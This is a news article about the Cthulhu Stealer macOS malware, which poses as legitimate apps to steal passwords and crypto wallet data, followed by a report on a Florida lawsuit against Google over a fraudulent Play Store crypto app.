Mac Users Beware: Cthulhu Stealer Malware Targeting crypto Wallets
Cybersecurity firm Cado Security recently issued a warning to Apple Mac users about a new malware threat called “Cthulhu Stealer.” This malware is crafted to infiltrate personal information and target cryptocurrency wallets, posing a significant risk to users.
The report from Cado Security emphasized the escalating threat landscape for macOS users, highlighting the need for heightened vigilance and security measures to counter such malicious software.
Cthulhu Stealer Masquerades as Legitimate Software
One of the notable characteristics of Cthulhu Stealer is its deceptive guise as legitimate software, such as popular applications like CleanMyMac or Adobe GenP. This malware is distributed in the form of an Apple disk image (DMG) to trick users into downloading it.
Once the user executes the downloaded file, they are prompted to input their password using macOS’s command-line tool, which then executes AppleScript and JavaScript. Subsequently, a second password prompt appears, specifically targeting the MetaMask ethereum wallet.
Notably, other prominent cryptocurrency wallets like those from Coinbase, Wasabi, Electrum, Atomic, binance, and Blockchain Wallet are also vulnerable to this malware.
As Cthulhu Stealer gains entry into the system, it stores pilfered data in text files and proceeds to profile the victim’s system by collecting information like IP address and operating system version. This data is then exfiltrated by the malware.
Tara Gould, a researcher at Cado Security, highlighted that Cthulhu Stealer bears resemblance to another malware strain called Atomic Stealer, which was identified in 2023 targeting Apple devices. Gould suggested that the developer behind Cthulhu Stealer likely repurposed code from Atomic Stealer to create this new threat.
Furthermore, Cthulhu Stealer has been leased out to affiliates for a monthly fee of $500 through the telegram messaging platform, with profits shared among the developers. Recent reports indicate disputes over payments causing the main scammers to vanish, sparking allegations of an exit scam.
In response to the rising prevalence of threats like Cthulhu Stealer, Apple has taken steps to enhance the security of its macOS platform, implementing updates aimed at fortifying Gatekeeper protections to prevent unauthorized applications from running.
Florida Woman Takes Legal Action Against Google Over Play Store crypto Scam
In a separate development, Maria Vaca, a resident of Florida, has initiated legal proceedings against Google, alleging that the tech giant’s negligence facilitated her loss of over $5 million. The lawsuit centers on Vaca being misled by a crypto investment app named Yobit Pro, obtained from the Google Play Store.
Google recently filed a lawsuit against two developers for producing 87 deceitful apps that defrauded upwards of 100,000 users, including 8,700 Americans. Although the lawsuit did not mention Yobit Pro, the tactics described echoed Vaca’s experience with the fraudulent app.
These tactics typically involve enticing users with promises of substantial returns, followed by demands for additional payments under the pretense of taxes or fees, ultimately preventing users from withdrawing their funds.
Meanwhile, Google has introduced a feature enabling users to search for wallet balances across various blockchains like bitcoin, Arbitrum, Avalanche, Optimism, Polygon, and Fantom. This move aims to provide users with greater visibility and transparency regarding their cryptocurrency holdings.
